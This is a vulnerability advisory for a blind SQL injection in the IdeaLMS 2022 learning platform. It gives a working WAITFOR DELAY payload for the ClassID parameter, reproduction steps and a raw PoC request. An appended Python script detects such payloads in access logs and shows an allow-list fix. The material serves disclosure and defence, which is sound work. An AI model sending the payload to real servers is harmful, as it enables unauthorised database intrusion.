Headline
CVE-2022-31788: SQL Injection Vulnerability PoC #1 - IdeaLMS
IdeaLMS 2022 allows SQL injection via the IdeaLMS/ChatRoom/ClassAccessControl/6?isBigBlueButton=0&ClassID= pathname.
Vulnerability Type: SQL Injection Vulnerability (Boolean-Based Blind)
Vendor of Product: Ideaco.ir
Affected Product Code Base: IdeaLMS
Product Version: 2022
Description: IdeaLMS allows SQL Injection via the ClassID parameter
Attack Vectors: An attacker injects a malicious payload into the ClassID parameter
Attack Type: Remote
Payload: -1%20waitfor%20delay'0%3a0%3a20'--
Assigned CVE-ID: <TBD>
Discoverer: Mohammad Reza Ismaeli Taba, Raspina Net Pars Group (RNPG Ltd.)
Steps To Reproduce
1. Browse the following page: https://<target.xyz>/IdeaLMS/ChatRoom/ClassAccessControl/6?isBigBlueButton=0&ClassID=6
2. Insert the malicious query as the value of the ClassID parameter
Example: https://<target.xyz>/IdeaLMS/ChatRoom/ClassAccessControl/6?isBigBlueButton=0&ClassID=-1%20waitfor%20delay'0%3a0%3a20'--
#PoC
GET /IdeaLMS/ChatRoom/ClassAccessControl/6?isBigBlueButton=0&ClassID=-1%20waitfor%20delay’0%3a0%3a20’-- HTTP/1.1
Host: <address in which IdeaLMS is set up>
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
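As an added example that is not part of the advisory or of IdeaLMS itself: a Python script that scans web-server access log lines for the time-delay payload carried in the PoC request above, and applies the allow-list check (ClassID must be a positive integer) that the application should enforce before the value reaches any SQL statement. The Common Log Format layout and the client addresses in the sample lines are constructed assumptions; the URL path, parameter names and payload are taken from the advisory.

```python
"""Detect the time-based SQL injection pattern from the IdeaLMS advisory in
web-server access logs and show the allow-list check that rejects it.

Assumptions: logs are in Common Log Format; the sample lines below are
constructed for this example and do not come from a real server.
"""
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Time-delay signatures: T-SQL WAITFOR DELAY (used in the advisory payload)
# plus MySQL/PostgreSQL equivalents, so the scan generalizes beyond MSSQL.
DELAY_PATTERNS = [
    re.compile(r"waitfor\s+delay", re.I),
    re.compile(r"\bsleep\s*\(", re.I),
    re.compile(r"\bpg_sleep\s*\(", re.I),
    re.compile(r"\bbenchmark\s*\(", re.I),
]

# Common Log Format: ip ident user [timestamp] "METHOD path HTTP/x" status size
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) \S+')

# The vulnerable endpoint named in the advisory (path prefix, ID varies).
TARGET_PREFIX = "/IdeaLMS/ChatRoom/ClassAccessControl/"

# Constructed sample log: one benign request, the advisory payload, a
# non-numeric probe, and an unrelated page.
SAMPLE_LOG = """\
203.0.113.10 - - [10/Jun/2022:12:00:01 +0000] "GET /IdeaLMS/ChatRoom/ClassAccessControl/6?isBigBlueButton=0&ClassID=6 HTTP/1.1" 200 5120
203.0.113.10 - - [10/Jun/2022:12:00:07 +0000] "GET /IdeaLMS/ChatRoom/ClassAccessControl/6?isBigBlueButton=0&ClassID=-1%20waitfor%20delay'0%3a0%3a20'-- HTTP/1.1" 200 5120
198.51.100.7 - - [10/Jun/2022:12:00:09 +0000] "GET /IdeaLMS/ChatRoom/ClassAccessControl/6?isBigBlueButton=0&ClassID=abc HTTP/1.1" 500 312
198.51.100.7 - - [10/Jun/2022:12:00:12 +0000] "GET /IdeaLMS/Home/Index HTTP/1.1" 200 2048
"""


def classid_is_valid(value: str) -> bool:
    """Allow-list check the application should apply: ClassID must be a
    plain positive integer. Anything else is rejected before reaching SQL."""
    return value.isdigit() and int(value) > 0


def scan_log_line(line: str):
    """Return (client_ip, decoded_classid, reason) when a request to the
    affected endpoint carries a suspicious ClassID, otherwise None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ip, _ts, _method, path, _status = m.groups()
    parts = urlsplit(path)
    if not parts.path.startswith(TARGET_PREFIX):
        return None
    # parse_qs decodes once; a second unquote catches double-encoded payloads.
    params = parse_qs(parts.query, keep_blank_values=True)
    for raw in params.get("ClassID", []):
        decoded = unquote(raw)
        for pat in DELAY_PATTERNS:
            if pat.search(decoded):
                return (ip, decoded, "time-based SQL injection signature")
        if not classid_is_valid(decoded):
            return (ip, decoded, "ClassID is not a positive integer")
    return None


def scan_log(text: str):
    """Scan every line of an access log; return the list of findings."""
    findings = []
    for line in text.splitlines():
        hit = scan_log_line(line)
        if hit:
            findings.append(hit)
    return findings


if __name__ == "__main__":
    for ip, value, reason in scan_log(SAMPLE_LOG):
        print(f"{ip}  ClassID={value!r}  -> {reason}")
```

The scan flags two of the four constructed lines: the advisory payload (matched on `waitfor delay`) and the non-numeric probe. The same `classid_is_valid` rule, applied server-side, would reject both before a query is built; the complete fix is still to bind ClassID as a typed parameter in the SQL statement rather than concatenating it.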